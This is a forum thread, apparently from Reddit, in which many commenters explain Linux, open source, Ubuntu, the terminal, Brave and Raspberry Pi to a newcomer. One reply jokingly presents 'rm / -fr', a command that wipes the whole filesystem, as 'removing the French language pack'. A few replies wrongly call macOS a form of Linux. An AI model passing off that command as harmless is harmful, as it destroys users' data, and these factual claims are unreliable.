A "terminal" is just a text-based interface. There are commands you can enter into the terminal. Each command performs a particular task like, copy a file, list files on the hard drive, delete/move files, or start a program. In simple terms, you're typing in what you want the computer to do.

"Brave" is a program that is used to browse the internet. It's similar to Chrome, Firefox, Safari, and Internet Explorer.

A Raspberry Pi is a small computer that can do light work. It's ideal for doing simple tasks without requiring power and bulk of a desktop-sized computer. It's a bicycle vs. a Big Mack truck.
the coolest thing about Linux from an outsider's point of view is that it's made by a global community of users, and both the code they write and how they decide what to do is fully open to the public. It grows by people sharing their contributions. Linux and associated projects are perhaps the most collaborative project in human history. There are all kinds of reasons why people share code, and some very large companies do it, as well as students. 

There are consequences of this. Ordinary users don't pay for it, and therefore don't have any direct influence, so Linux is made to appeal to the people who make it (although some Linux versions deliberately try to be more appealing to new users; Rasperberry PI and Ubuntu are two projects like this). Being a Linux user means a commitment to learn how to use a powerful and complex operating system, and I suppose once you've done this, you have earnt the right to feel a bit different, and let's be honest, a bit superior. Around the world only about 2% of desktop computers use Linux, but at least 25% of programmers use it, it seems, and most servers run on linux. So it doesn't have many users, but the users it does have are the most influential users for the future of IT. 

Considering the people steering linux and other open source projects are mostly the best coders, this means it is technically well designed, because Linux developers hate bad design, and unike someone doing what they are told by a middle-mager, open source developers can't be told what to do. But it also means Linux is for what we now call "makers". since it comes with free and easy access to code-writing tools. The terminal is another sign that Linux is designed for power users; it is a way of sending complex commands directly to the heart of the operating system, and you can easily write steps of commands and save them for reuse. For some reason, many ordinary users think this is insane, mostly because you have to do some learning to take advantage. This attitude is puzzling, because computers exist in the first place as machines to automate tasks, and the terminal is a great way to actually do this. People only use the terminal because it is the fastest way to get things done. To me and probably other linux users, it is very odd to have powerful hardware crippled by an operating system that has to avoid confusing users who were quite happy with what they had 20 years ago.

Also, it is free because there is no point charging for it, since the code is not a secret and anyone can use it just by downloading it. 

The feeling of being able to collaborate is pretty exciting for people who like building things. Also it means you have much more control over your computer. Some clever person has bound to have already solved the change or problem you have, and if not, you can have a go at fixing it yourself (I have done myself a couple of times). 

And because there is nothing stopping someone from taking linux and doing whatever they want with it, it is the basis of nearly all innovations in IT in the past 20 years. So Linux skills and a history of contributing to open source projects is very helpful in the job market. In fact, many important technologies don't work on Windows at all. 

Overall, it reminds me a little bit of people who used to prefer cars with manual transmissions. In skilled hands, you could get more from the same car compared with automatic transmissions But honestly, a lot of people will take an automatic.
Wow! Is this post for real? Assuming it is:

You use Apple. Your Macbook runs OSX as its operating system. OSX is closed source proprietary software. This means nobody has access to the code other than Apple and if anybody tries to use the code outside of the permission of & terms set by Apple then they will use the violence of the courts to sue them.

Apple also has another (obsolete) version of its operating system called Darwin, which is 'open source'. This means anybody can take the code and change it to suit their needs. The code also being 'open' means that it is published for all to see. As such it can be audited to be improved upon but also audited to see if there is anything malicious there. Is the code stealing your data, invading your privacy, using your computer power for other purposes or installing backdoor for government to spy on you? When the code is open sourced then developers the world over can freely check that it is ok.

If you are terrified of getting hacked then using Open Source software is actually better for security! Apple is fairly good as far as we know - but as OSX is not open source we really do not know. We cannot check! They do have a deal with the NSA though!

&#x200B;

Apple has two versions of it computer operating system; OSX and Darwin, but with Linux based operating systems there are over 200 versions. There is not just one company like Apple using Linux but many companies, organisations and individuals who create their own Linux based operating system. Ubuntu is the most popular and well known.

&#x200B;

I am sorry Linux looks creepy to you. It does not have to. You can in fact customise your linux desktop to look exactly like your macbook if you choose. A complete noob can use Linux without too much extra effort. Linux however lets those who wish to be more advanced the ability to do so. The terminal is just a way to do this without using an application. You could use an app store to download an app. You could do this faster by using a terminal and do so with more granularity.

&#x200B;

What Linux users find 'creepy' is blindly placing your trust in a proprietary company - like Apple. This would be like a card dealer not cutting the deck in front of the players. Apple also is more of a religious experience. This is creepy. Linux however is a community experience. This is why you bf may be excited about it. Rather than being a disciple he can be a contributing member of a community.

&#x200B;

A rasberry pi is just a cheap little computer. You many have seen an Android TV box. It is similar but can be programmed for many different functions.

&#x200B;

Thanks for your question.
No reason to be terrified.  If your BF sets it up so that you are an ordinary user, then there isn't really anything you can do to "break" it for him or anybody else.  It's not like taking out his nice new car to drive when you don't know how to drive.  

And if you set up a good password (with capital and lower case letters, a number or two and a symbol) then chances of hacking are almost zero. And Viruses aren't really a thing in Linux either.  I've been running it for 10+ years and never have had one.
Free and open refers to the philosophy. In the beginning there was a movement called the free software movement which emphasised that software must abide by a user's freedom. Open source movement is similar to the free software movement and is the same in about 99.9% of the time. Free software gives freedom and open source allows people to change and contribute to the software this nature of open source was in free software but open source became a thing to commercialize free software. And the other things like ubuntu are distros which use the linux kernel (heart of the OS), the kernel decides how much resources (CPU,RAM,etc) a program gets. It also has the GNU Coreutils which provide features and a basic interface for the user to interact with the computer. There are other distros which don't use the gnu Coreutils. eg: Alpine Linux. and use other Coreutils.
I hope this part made sense for now. You can always read wikipedia and watch YouTube videos on the topic.

Next comes the package manager. These control how new software like games are Installed on the OS. Ubuntu uses dpkg as it's backend which is the debian package manager ( Ubuntu is based on another Linux OS called Debian) backend is a low level version which has basic functionality. dpkg has a front end called apt which is what allows you to install software from online sources. Front end is a high level version with some extra features. Some distros don't have a package manager. Those distros encourage users to manually get the code of the software then build it(convert human readable code into computer language and install it) this approach is called source based.

Next comes the terminal, Command Line Interface (CLI) and the shell. The terminal which is short for terminal emulator is mimicking a really old computer terminal from the 1960s which was a big heavy box with a screen and keyboard. The modern terminals provide similar functionality.
Next thing is the shell. Shell is the User Interface and the program that reads input from a terminal. It is also a scripting language which enables the user to create programs that make work easy.
The interface provided by the terminal and shell is often called command line interface or CLI
The shell and the terminal allow the user to interact with the computer and get work done. Once you learn it , it's going to be much efficient than a graphical interface.

I think this is a decent introduction and may address some of your questions. If you have some questions you can still ask them and you can read online from websites like wikipedia and watch some videos on YouTube.
Here's my take on the questions and answers on this topic.

1. &#x200B;

>What is Linux? 

Linux is an operating system kernel created by Linus Torvald. A Kernel refers to the essential building blocks of an operating system. All operating systems use some form of a Kernel. Windows uses the NT Kernel while macOS uses the BSD Kernel. In fact, Linux and BSD(and to some extent macOS) have a common ancestor, Unix!

However, as time passed by, people started to call operating systems that use the Linux kernel as Linux. While this is not a perfectly correct term, it's been set in stone. Thus, Linux can either refer to the OS kernel created by Linus or could refer to the family of operating systems that use the Linux Kernel.

Each of the Linux based operating systems is also called Distribution, or distro for short.

2.

>What is Free and Open Source Software?

Commonly called FOSS, FOSS is the design philosophy of programs. The exact definition and philosophy changes depending on the exact license a developer uses, but in general, FOSS means that the source code for the program is available to the public. The advantages are that

* A. The software can be ported to all system platforms by the user.
* B. A user with enough technical knowledge can check the code for any malicious content(Viruses, or parts that infringe on user privacy).
* C. Users can edit the code directly, adding new features to suit their needs.
* D. Users can reupload the code to the developer, helping to add features and squashing bugs.

Please note that Free in this context could mean "Free Beer" or "Free Speech". This too depends on the exact license the user uses.

3.

>What is Ubuntu?

Ubuntu is one of the operating systems that uses the Linux Kernel. Developed by UK company Canonical, Ubuntu is commonly used for home computers, large data centers, to IOT devices like smart speakers, etc. It is the most widely used distro for home users as it has a nice interface, extremely easy to use, and has a wide support base thanks to its popularity. Together with Mint and PopOS, it is the Linux based OS we generally recommend to people switching over to Linux as their main operating system.

4.

>What is the Terminal?

A terminal is basically a magic black box that people use to issue magic spells to the computer. The Linux terminal is generally more featureful compared to windows or Mac. For example, I can type 

    sudo apt install firefox 

to the magic, black box, and Firefox will be installed. Many users prefer this type of interface as it is simple, gets out of the way, and for the most part "Just works". If you decide to use Linux, you won't have to use the Terminal too much so don't be intimidated.

5.

>What is Brave?

Brave here most probably means the web browser. It is commonly advertised as a replacement for Chrome(the web browser made by Google) or Safari that is more privacy-oriented. The Google Search engine has nothing to do with Brave. Most Linux users use Firefox though.

6.

>What is a Raspberry pi?

The Raspberry pi is an all in one computer that can run Arm-based operating systems. Though, it commonly uses Arm-based Linux operating systems. It's a small computer board with all the things needed to run a computer. It is commonly used for DIY smart device tinkering, or to simply be used as a home computer. Thanks to its affordability, people also use it as a way to introduce Linux operating systems to other people.

7.Other Mics questions.

>Fear of getting hacked.

Linux based operating systems are generally more robust to computer attacks or viruses. Though no system is 100% secure, and the best anti-virus is common sense. Don't click on sketchy website ads, don't install programs from sketchy sources, and don't blindly follow internet guides by unreputable sources.

>Is Linux wonkier than windows or mac?

It can be depending on the exact Linux OS you use. If you use something like Ubuntu, Pop, or Mint then no it will not be wonky. However, Raspebian, the Linux distro used by the Raspberry pi by default, can be a bit janky. The best way to use it for you would be to run it in a virtual machine, or install it directly on your computer(though I heard that this is significantly more difficult on Apple devices. Curse you Apple!).

Hopefully, this answers all of your questions. If you have more, please feel free to ask them.
I've got nothing to add to the explanation that others haven't done a great job of already.

I just want to say that you're adorable.  Never stop trying to connect with your partner's interests.  Speaking from someone with a girlfriend who does the same thing, it never fails to make us feel warm and fuzzy inside :)
I'm seeing a lot of descriptions here already; some of which are pretty good. I don't know if I can do better but I'll give it a shot.

Let's start by making sure the basics are covered. A program is essentially a set of instructions for a computer to follow; kinda like a recipe. When a computer is running a program, it is known as a process. Old computers could only run one process at a time. However, as computers became more powerful and we started to use them for more things, we needed a way to have one computer to execute multiple processes at the same time. The solution to this is to have an operating system.

An operating system is a special program whose job is to manage multiple processes. Examples of modern operating systems include Mac OS, Windows, and Linux. Linux is popular among programmers and power users because, unlike Mac OS or Windows, the source code is public and free. 

To talk specifically about linux, linux itself is just the program that manages the processes, called the kernel. All of the fancy graphics or even the command line tools are built separately.  That's why linux has what are called distributions, or distros for short. Distros contain all the fancy things that us humans need to start programs like a desktop or the command line. Many distros are also open source and free, but not all of them. Some distros are even built on top of other distros. For example, Ubuntu is a popular distro that is originally branched off from the widely used debian distro. Also, linux appears in places you wouldn't expect. For instance, Android is a linux distro maintained by Google that powers almost all non-apple phones. 

If your boyfriend is at a command line on linux, it's most likely he's running a program called bash. Bash (stands for Bourne Again SHell) is a shell program, which is a "shell" for other programs to run in. The program that displays your desktop is also a shell because you launch programs from it. Bash is a very popular command line based shell because it is included in nearly every linux distribution. Every command typed in bash is really just the name of a program, followed by inputs to the program. For example, you can run \`firefox reddit.com\` to open the program firefox and pass it the input \`reddit.com\`, which here firefox would now know to open reddit. The command line can be daunting, but it is one of the coolest things to learn when you're using linux.

&#x200B;

I don't know if that clears anything up for you but hopefully it makes sense and opens a door.
People may get very passionate after discovering Linux because it's a very powerful and liberating operating system, that's free and not marketed at all. It feels like an entire new world opening at your fingertips. It's based on the same standards that Apple used for its MacOS, but works on very simple and low power computers, such as a Raspberry Pi, as well.

So, not an alien technology, nothing underground. More like cooking yourself, or doing woodwork, instead of buying meals and finished furniture. You can do what you want, and if you spend some time, get much better quality, cheaper. And all recipe books, or furniture drawings and tools  are available for free.
Hi! I think it's great that you have this interest in your BF's hobby. I'm lucky enough to have a wife who understands and supports my obsession, so I feel this is a good way for me to pay it forward. I also have some experience talking to people about what Linux is from my days hosting on some Linux-focused podcasts.

At its most basic, Linux is a way for computer users to interact with various things, such as the computer hardware, other computers on the network, so on and so forth. It's really just a framework that allows for computing things to happen.

What makes Linux special is that it's a massive, communal project with contributors from all over the globe. Companies add to it, but so do random individuals who only do it for fun in their spare time. This sense of community doesn't just live around "Linux," but also to most of the products and projects that are built on top of it, as well.

The "free and open source" bit means that the code for Linux has a license that not only allows anyone to reuse the project, but also limits others' abilities to take the project outside of the community and use it without contributing back. Think of this sort of like in Kindergarten. You had to share your toys so that everyone in the class could benefit, right? It's the same principle.

Ubuntu is a perfect example of this. It is an operating system that is built on top of Linux. Ubuntu is made by a British company, and sports numerous high-dollar contracts with very large companies. In fact, much of the Internet runs on Ubuntu now.

But it's not all business with Ubuntu! While that's their main focus as _a company_, they also produce community-centric products, and contribute to other projects that they themselves borrow from. So while Canonical (Ubuntu's parent company) may be in direct competition with Red Hat (another mega-large Linux vendor, now owned by IBM), they both will contribute to the success of shared projects!

Since both companies are contributing to "free and open" projects that they benefit from, both companies are able to freely receive benefits from each other, and the wider community for that matter. It's this sense of community that really draws people in. 

What exactly is a contribution, though? Most people think that code is the only thing to contribute, but that's false! Linux projects need all sorts of help! Artwork, evangelism, bug testing, administration, finances, etc. all need to be handled for large-scale project.

The big takeaway here is that Linux=Community. Don't worry about things like the Raspberry Pi or the terminal or any of that right now. They're just more little aspects of it that your BF uses.
I'm like that guy in the relationship I guess, and I can very much see his tastes align with much of the Linux community.   
First of all, it's very nice of you to have the humility to ask about this, and I can definitely understand where you're coming from.

Secondly, where his excitement stems from is the fact that Linux allows him to play with his computer to the maximum state possible, and the ability to play around and configure things just the way he likes is probably very appealing. (Assuming its even more so considering he's a programmer.) This what the "Free and Open" parts mean, think of it like having Legos as compared to a ready made toy. That's right, endless customization.  


Third, lets explain his choices, "Ubuntu" is a common Linux "distribution" (basically a version) many people use. If I use the previous analogy, it's like getting a ready made Lego build. It saves time and hassle. The "Terminal" is a command line interface, you've likely seen the terminal application on your MacBook, it's almost exactly the same thing, that can change depending on the version of Linux you choose or if you configure it yourself. (Swapping some Lego parts) "Brave" is just another browser like "Chrome" or "Safari". A "Raspberry Pi" is a hardware component that is mostly used to tinker around, think of it like tools used to build Legos, I guess. He likely chose Lenovo thanks to their excellent keyboards and support for Linux as a whole.  


While hackers do use Linux as well, not everyone who uses Linux is a hacker. Think of Linux as the tool, a knife if you will, and what he does with the knife is totally up to him. Considering what you've let me know, it's more likely he'll be cooking up some great food (apps) or be a knight in shining armor using the knife for good (white hat hackers) than he is to use the knife for bad, I think.  


If you didn't understand anything, don't hesitate to comment and ask! We'd love for you to get your hands in Linux as well!  


~~>InB4 any Linux enthusiast complains that Lego is not free and open source.~~
Since i haven't seen it here yet, I just wanted to say, your boyfriend is extremely lucky to have you. Having a partner that sees how excited you are about a topic, know nothing, and actively engage to learn and understand so they can enjoy it with you is extremely rare amd even more so in the technology world.

What I will tell you, given all the history that has been summarized here, the community of people behind Linux is the single greatest resource there is in our ecosystem. Behind every community, hobby, or group there is always a mixed field of people but the community behind Linux is easily the most knowledgeable, kind, caring, and selfless group I've ever seen.

It's okay to feel overwhelmed, and none of us, nor your boyfriend expect yo to learn any of this quickly. What matters is you enjoy the ride and have fun. The knowledge, experience, and history you build is the journey and just know we are all here to help you; just as we were helped, all we ask is you carry that forward and help the next generation. 

Enjoy the ride, Linux is amazing.
Sometimes people dont need to share everything together.

My now ex-wife was bylingual (English/mandarin) while i only speak english, and was an accountant while i am an "it nerd".  we were together for 22 years and she never picked up technology, i never picked up mandarin or accounting.  

It is really nice to see you trying to get into it a bit for him, but he can also have "his things" while you have "your things".

I work in a sector many people don't understand, and one time a co-worker came to me for advice, how do you explain what you do to friends/family.  I told her i just avoid the subject entirely because it is hard to explain, and are they really that interested or just making small talk?
[removed]
They are Lego for adults, basically.  The different flavors of Linux and FreeBSD and raspberry pis and SBC are like different shades of lipsticks and cosmetics.  

Windows 10 and MacOS are for normal people.  Linux and Raspberry pis are for hobbyists and professionals.  They generally do not make your life easier.  Even hobbyists very rarely create things that are not otherwise available off-the-shelf.  Like I said, it is a hobby.
Ask him about the basics.

The standard Stallman Ted talk explains things fine.

Beyond the basic concepts of controlling your machine, it doesn't really matter. For example, the fact that Chinese people can't complain about their own government is relevant.  The fact that I store music configs in `/etc/mpd.conf` actually doesn't matter - it's just random crap that makes life easy for computer people.

> He’s so enamored with it, and wants to share it with me and make me use it,

I get the enthusiasm, but this is a mistake. My gf 'uses my raspberry pi' in the sense that I torrent series for her. She doesn't need to know how it works.
I can really recommend Jason Dion and his Linux course on Udemy site:

[https://www.udemy.com/course/linux-essentials-010/](https://www.udemy.com/course/linux-essentials-010/)
Your boyfriend now has at his disposal endless code that other people have written that he can use for his own projects. It's like an endless shopping spree for developers.

The cool part is, since he is getting all of this free stuff, he'll feel like contributing back to the projects he uses. That completes the F/OSS (Free, Open Source Software) loop, essential to the open source ecosystem.
The best way to learn it is to use it.
It's owned by nobody and doesn't spy on you or track you.

That alone is worth the (free) ticket price.
If your boyfriend wants you to be "into Linux" with him, then why isn't ***HE*** answering these questions?
[removed]
You've got Mac, Windows, ubuntu (Linux Variant), RedHat (different Linux) and many other Linux systems. 

Windows has windows vista, windows 7, windows 10 and server, you could think of Linux as just different versions (it gets more technical, but there you go) 

Also, always use sudo jokes!
One of the most important things to understand is what programming _is_.  It's easy to dismiss it as "telling the computer what to do", which is true, but it doesn't capture the feelings, either the feelings of doing it, or the feelings of having done it.  It feels nothing like telling an obedient employee or a pet what to do.

In some sense, programming computers is as close an analogy as humanity has to what it would be like to be a god.  To be able to see and manipulate anything at all, for whatever purpose you choose.  To see not merely what is, but also what could be and what cannot be.  To see what is working well, why it works well, what doesn't work well, and what prevents you from doing something about it.  To be responsible for every facet and quirk of a thing.  Imagine if you were a god of the cosmos, how many ants do you have to get right, how much water, how many galaxies?  What happens if you screw one up in some tiny way?

So the passion he has is the passion of being unhindered.  "Free and open" means "you're allowed to use the power you have to control what is yours".  It would be very reasonable of you to hear that and ask "If not me, who _is_ in charge of what is mine?  Do their goals align with my goals or best interests?".  I'll spoil it for you, the people in charge of your iThings do not have your best interests in mind, but don't automatically assume that they're therefore the wrong options for you; like everything else it's a trade off, you're choosing to give up power over your things, and in exchange, you're not responsible for them (for the most part).  He chooses differently, because he enjoys exercising that power/responsibility.  Neither perspective is inherently "right", it's preference.

So when he wants to talk about some new techno-thing, you can actually hold your own in conversation without knowing anything about the technology by focusing on power.  What does the new thing give you the power to do?  What are the power relationships and trade-offs for the more mainstream solutions?  What will you actually do with the new power?  These kinds of things.  The rest are just technical details.  Take Brave for example.  Brave is a FOSS (Free Open Source Software) web browser that does its best to combat the Google hegemony.  What power does it give you over other FOSS like Firefox?  He'll say "something something google something tracking something DRM something".  What does that information allow Google to do?  And of that, what do they choose to do?   Etc.
You say you use a MacBook. That is BSD (a form of Linux/Unix) under the covers. Apple put a very slick interface on top of unix, but all the command are linux underneath. 

If you've ever had to type in commands into the system terminal (99% of Mac users don't), you've used linux.
It seems you have the desire to learn, do it one step at a time and you'll reach a point where those terms he mentions will be natural for you as well, you can't jump directly into trying to understand everything he says, just start learning with books, youtube, online courses, whatever is best for you.
Jus be patient and do it one step at a time ;)
You've got a lot to read already, and a lot of it is getting decently technical, so I'll keep this brief.

The biggest thing to understand is the Terminal or Console or Shell. It's a way to type in commands manually instead of pointing and clicking through finder.

So in Finder imagine you've got a folder called Photos, and it had a folder called 2020, and that has one called December, and that has a folder called Christmas, and that has a bunch of photos in it from Christmas.  

Getting to that folder and moving files around takes a lot of clicks, but with Terminal you could go directly to that folder by typing in "cd Photos/2020/December/Christmas" . Once there you could quickly copy all the files out of there to somewhere else if you wanted, or compress them all into a .zip file. 

There's a lot of more complex things you can do with a bit of know how that make it insanely quick to pull off. 

Like imagine you have a bunch of photos and videos that are unsorted and you want to put them all into a folder called 2020 if they were taken this year.  

In Terminal you could type in a command that would move all the files with 2020 somewhere in their name, in one simple line.   

In Finder you could easily spend a decent amount of time clicking on all the right files to try and move them.  


There's a ton more utility that a knowledgeable user could do very quickly and it's super exciting.
\> If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it?

&#x200B;

I really wish you would have said, "If you guys had a GF, how would you even begin to explain it?"

Man. That would have been the ultimate burn. :D
Kernel: The kernel is the core of the Operating System

Ubuntu is a distribution of Linux (Runs the Linux kernel but everything else was chosen by the developers)

Open-Source: You can look at the code something is made from and do anything you want with it

Terminal: A text-based program to do things in a system (The thing hackers use in movies)

Brave: A browser, based off of Chromium (The same thing Google Chrome is based off of)

Raspberry Pi: A little mini-computer that enthusiasts tinker with, it's used a lot in DIY projects

Desktop Environment: This is basically what the desktop screen looks like and how it functions (Ubuntu uses the Gnome 3 desktop environment, Linux Mint [Based on Ubuntu] uses the Cinnamon desktop environment, etc.)

Try out Linux yourself, it might grow on you ;)
It helps to understand that before GUIs (aka Graphical User Interfaces) there were only CLIs (command line interfaces). They're called that, respectively, because with a GUI you're the user and the interface is graphical (aka point and click) and with a CLI pretty much everything involves typing a command and maybe some arguments and hitting enter.  
  
A "terminal" usually means a *terminal emulator*, because the original terminal was a teletype (aka TTY) which was just a fancy typewriter that sent what you typed to the computer and printed whatever the computer output. In any case it's a fairly general term for anytime you are using the CLI, but also refers to specific GUI programs that present a text interface.
  
Here are some very common Linux commands (at CLI):  
  
```  
cd - Change Directory  
ls - LiSt files  
cp - CoPy files  
mv - move a file to a different location (you can rename stuff this way)  
pwd - print working directory (e.g. /home/istarian/documents)  
date - print the current time and date the system is set to  
ps  - list ProceSses  
mkdir - MaKe DIRectory  
rmdir - ReMove DIRectory  
```  
  
As someone else pointed out it requires patience and the other person's willingness to commit some time and energy to learning. I'm not sure myself what the best place is to start, but there are some basic concepts that are important to understand.  
  
The raspberry pi is a good learning tool because it's inexpensive and it's not a crisis if you bork the operating system. You know as long as you treat it as for experimentation and not daily use.
You know the difference between Windows and Mac OS X? It's kind of like that difference, except it's another option.

Windows and Mac OS X try to be as easy to use as possible. In a lot of ways, that also means that it tries to be as simple and basic as possible. Linux _can_ be that way, but the option to learn a trick or two to do complex things quickly is around every corner.

Some people just want to open a browser, write a letter, or play a game. But for those that are interested, why walk when you could run? Or drive? Or fly? A lot of people use their computer for decades of their life, so it just makes sense that some people want to learn how to use it better.

You don't need to know anything about Linux to know about sharpened tools for the job. A nice pair of boots will help you hike. A nicer camera will take better pictures. A bigger truck will haul more. A sturdier mixer will help you bake better. A more capable operating system will help you use a computer better. However, if you don't hike, take a lot of pictures, haul things, bake, or use a computer often, you might not really see the need for any of these things.

As far as security goes, in general, Linux is significantly more secure than Windows or Mac OS X. In fact, the majority of the internet runs on it. If you have an Android phone, you're even running Linux already. Your router might use it. Tesla cars use it. It is everywhere, but it's not really advertised as much.

Part of that security is due to the thing you mentioned, ”open source.” For the most part, programmers write in programming languages, but computers themselves don't. Computers need to have code ”compiled” into a format that it knows how to run, first. Imagine being served flour and unopened eggs for lunch. You wouldn't eat it, right? You'd want to crack the eggs, mix in flour, and boil it into pasta. Now imagine the ingredients and recipe as the ”source code” and the pasta as the compiled language.

If you wanted to tweak a recipe, you'd want those ingredients and recipe. Maybe you want to add some herbs and some salt. You couldn't do that with finished pasta. In fact, if you are at a restaurant, you might not know how they made it. Maybe that's a secret recipe. Maybe they don't want you to copy them. Having the recipe freely available is ”open source,” and keeping it a secret is ”closed source.” 

Closed source stuff, like Windows and Mac OS X, is only distributed as the format the computer knows how to run (the finished pasta). Open source stuff provides you with all the ingredients and even encourages you to share the recipe. In fact, the license agreement mandates that you must share it _under law_ if you make changes. So everything is free and open, and you can make as many tweaks to the pasta as you want. If this is a new feature or security problem, you have everything you need to make any improvements you want.

I could write more, but there's your wall of text 😄
I just want to chime in and say that you sound amazingly nice and supportive.

Software is special because it's possible for thousands of people to work on improving the same thing at the same time. An improvement may be fixing an error, adding a new feature, or anything else you can think of. The mentality is generally that you get to use the software, absolutely free of charge, and if you make changes it would be nice if you'd share them with the world. We call programs that are made like this "open source software". It works because when many people come together and pitch in with their own expertise, the outcome is much greater than anything any one of us could have made on our own.

Linux is one of the best examples of this. It's a giant global effort to make computers of all kinds usable without leasing expensive software from a company (Mac OS or Windows, for example).

Many programs are open source, for example the Firefox browser, most of Google Chrome, the Android operating system (which is based on Linux), the VLC media player, a huge portion of the backbone of the internet, and so on. 

In short terms, your boyfriend is interested in the powers of collaboration, and what happens when people put their differences aside and work to improve things together.
linux foundation has a free course on linux which covers the basics you can start there.
Hokay.  I'll give it my best somewhat altered take on this.

You're likely familiar with Mac, Windows, iOS, and Android.  Linux is like them, but it goes on computers you already own.  Any computer, really--though getting it on Apple devices is currently not supported due to the architecture being new.

However, unlike Mac, Windows, iOS, and Android, Linux is a blend of a LOT of different software that does common computer tasks, each of those pieces of software is made by wholly independent teams.  The centermost and most important part of it is Linux, the operating system kernel.  It manages your computer.  But there are other things we use with it.

In the Linux world, we prefer to use software where *we* as *humans* can read the instructions given to the computer.  This allows us the ability to build it and use it on our computers as well as to make and distribute changes to that software.  This is the open part.  Yes, even for profit if you want.  You can do *anything you want with it* without any restrictions.  *That's* the free part.  

And one way you can profit is to put together various components in what we call a "Linux Distribution" or "distro" for short.  These people will not only provide people with a complete computer system, but they'll even allow others to tell them what changes to make that code.  They sell that as a service.

Most operating systems are intended to be used through graphical user interfaces, or GUIs (pronounced gooey).  They are more intuitive as humans are deeply visual.  However, Linux is primarily intended to be used via a command line interface.  Yes, Linux GUIs exist (like a lot of them, and you can choose and customize them however you want).  However, the command line is king.  

With the command line, we can not just do what we want, we can make *programs* to do what we want.  We can feed the output of a program into another program as input via the command line.  Yes, it's scary.  It took me two years not to stare blankly at it for 15 minutes at the raw power of it before working.  I totally understand that it's a bit creepy.
 your boyfriend a privacy advocate that tends to be the case with a lot of linux users

the terminal on linux is not very hard to use and honestly you are not going to use it very much in my experiance

&#x200B;

chances are theres an open source project for your passion
he's young, think's linux is cool for various reasons that mostly just boil down to time wasting...you don't have a family together yet so he's maybe also happy writing software for nothing in his spare time. one day that will wear off and he probably needs to get something done or wants a computer that actually works and buys a mac.. don't bother understandings you definitely have better things to do too! the end
If you would like to learn more about Linux there is a monthly Linux class that can help with step by step learning. Check out r/linuxupskillchallenge for more info. 

You seem to have a bit of fear when it comes to computers. This is super common. One thing about people who are "good with computers" is that we just click on things or type things in. It is actually fairly difficult to hurt a computer. But if you are afraid of hurting one a cheaper secondary device like a raspberry pi is a great starting place. A virtual machine is another good starting place. With a device like this, if you break it, you just reset it and start over. Sure you lose a few hours of progress but you learned a bit of what not to do along the way. 

I highly recommend using a non-primary device to learn. You don't have as much emotional investment in them.  IT folks like to say treat servers as cattle not pets. These devices should have a purpose (learning) but should not be considered irreplaceable. ie if it gets sick (you broke it) you shouldn't feel bad putting it down (resetting it to initial settings). 

Also take a look at https://xkcd.com/627/ 

This chart is the essence of IT mentality. We don't know everything. We push buttons. We click on things. Eventually we find the answers through a combination of educated guesses and blind luck. Don't be afraid to click things. Be bold in your exploration. Learn how to install Ubuntu! Figure out what removing the French language pack means. (rm / -fr) (don't do this on a system you care about!) 

Linux is about exploring limits. Learn how to use man files. Try this one (man ls) for a start. The man files are one of the main ways to learn more about how linux works. 

If you want to get deeper then consider reading an A+ cert book. It will teach you a lot about how and why computers do what they do. It's a lot to learn though.
Not sure if anyone covered this point but Linux is an operating system, so what is an operating system?  Well consider the fact that your computer is just a bunch of electronics.  On it's own, it can't really do much.  So it needs a special program to run the whole computer.   This program then runs your other programs like games, internet browser etc and handles everything such as making the computer display things, or play sound, or understand input from keyboard and mouse.   Windows is typically the operating system most computers run.  Linux is an alternative one.  Basically it's another choice of OS.  There's many reasons some choose it over Windows, which have been reflected here so I won't go into all of those details. 

I hope this helps.  Lot of other good stuff going in more details has been covered here too.
First, let me say that it's awesome you're trying to learn about this just to share in his excitement.  You're a kick ass person. 

So all tech things need an operating system, right?  This is what allows you to use it to make it do stuff like open programs, look at pictures, etc.

Apple has two operating systems: MacOS and iOS (computer and mobile, respectively). Microsoft has Windows for computers.

All of those are called closed source.  The code that makes them up are company secrets and aren't freely available for just anyone to see.  They don't want that information floating freely about because that's money to them, right?

Linux is a community owned OS. That means all the code that goes into it is wide open for anyone to, not only SEE but CHANGE. Anyone can take Linux and modify it and rerelease it. 

Ubuntu?  Its a linux OS managed by a company called Canonical. But there are others, some managed by companies and some by just groups of nerds who like computers. 

The upside to Linux is it's free. Like free money wise. You don't have to pay to install it or use it. Its also super modifiable; which means you can make it do whatever you want. 

Want a different desktop layout?  Done. Want to run a server for streaming music?  Done. Want to launch a rocket?  Done. Its super super super flexible and powerful. Almost all of the internet runs off it because of this.

So effectively it's a way to communicate and use computers that's not regulated by a single entity. If you have an iPhone or Mac you can't really change much about the way it behaves. You can't make it look like Windows, for example. You can't strip out parts you don't want or make it work differently: what you see is pretty much what you get. 

But you can with Linux. The sky is pretty much the limit.
No one is in my life understand Linux including family, friends etc. so its normal to can’t understand Linux. So let me explain Linux! Linux = What u want from computer, open source(this means you can use it how u want), high customisations, SECURE, user friendly(some are user friendly like Ubuntu and Linux Mint some are not good for new users example Gentoo Linux) etc.. If u start using Linux (Any distribution) u don’t wanna use other operating systems. Good Luck on ur Linux Journey!
Super cool that you're trying to get into some of this stuff! Gl with everything ❤❤ linux is confusing at first, especially if you have no programming experience, but its handy to know of you're into that kinda thing.
honestly, just sit quietly and wait.  right now it's like a new toy to him, that he's likely to get tired of quickly
A lot of people gave really detailed answers about your specific questions, so I figured I should add my personal experience.

My fiance is extremely tech illiterate and doesn't really like computers or smart phones. She's also really scared of getting hacked like you mentioned.

However, she loves when I get excited about something and really likes hearing me talk about it and try to explain it to her. I also enjoy trying to explain it to her and I have noticed that trying to explain the situation to her can also help me understand it better or debug whatever issue I am having.
Follow him to a Linux conference. My (now) wife did. <3
I wouldn't bother my partner with this.
Fake. No one is into Linux can have a girlfriend
You probably won't see this bc it will get lost in the sea of comments but you seem like a good gf. I wish I had someone who took an interest in my nerdy activities.
Start every request with sudo.
1)  Brave is a scam and steals from content creators.  If he actually cares and just wants open source he can use Chromium instead.

2)  macOS is based on BSD which is a very close cousin to Linux.  Most of the things he can do in Ubuntu you can do on your MacBook.  I'd start with learning more about your Mac and getting comfortable using its terminal.

3)  Whenever he says "Linux" correct him and say it is "GNU/Linux".
[deleted]
My suggestion is to treat Linux as something more than a hobby. Linux is a powerful operating system that allows you to do most things MacOS does. And MacOS is based on BSD linux which is a linux variant. So you are using Linux already. 

The best way for you to learn linux is to use it to do something productive. If you're a musician, use LMMS and Audacity to record + mix music. If you're an artist use Krita and Blender to produce 2D/3D. 

